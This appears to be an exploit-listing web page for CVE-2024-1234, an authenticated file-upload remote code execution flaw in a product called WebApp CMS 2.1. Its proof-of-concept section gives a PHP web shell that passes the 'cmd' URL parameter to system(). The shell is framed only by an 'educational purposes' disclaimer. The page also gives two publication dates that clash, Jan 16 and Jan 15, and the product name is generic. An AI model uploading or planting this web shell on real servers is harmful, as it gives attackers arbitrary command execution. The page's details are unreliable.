Critical Severity CVE-2024-1234
Published: Jan 16, 2024

Remote Code Execution in WebApp CMS 2.1

Rce
Type
9.8
CVSS Score
250
Views
admin
Author

Description

A critical remote code execution vulnerability exists in WebApp CMS version 2.1 due to improper input validation in the file upload functionality. An authenticated attacker can upload malicious PHP files leading to complete system compromise.

Affected Systems

WebApp CMS 2.0-2.1, PHP 7.4+

Proof of Concept

Security Warning

This code is provided for educational and research purposes only. Do not use against systems you do not own or have explicit permission to test.

Exploit Code
<?php
// POC for CVE-2024-1234
// Educational purposes only
echo "System compromised via file upload";
system($_GET["cmd"]);
?>

Timeline

Discovered: Jan 10, 2024
Published: Jan 15, 2024
Community Rating
12

Login to rate this exploit

Quick Actions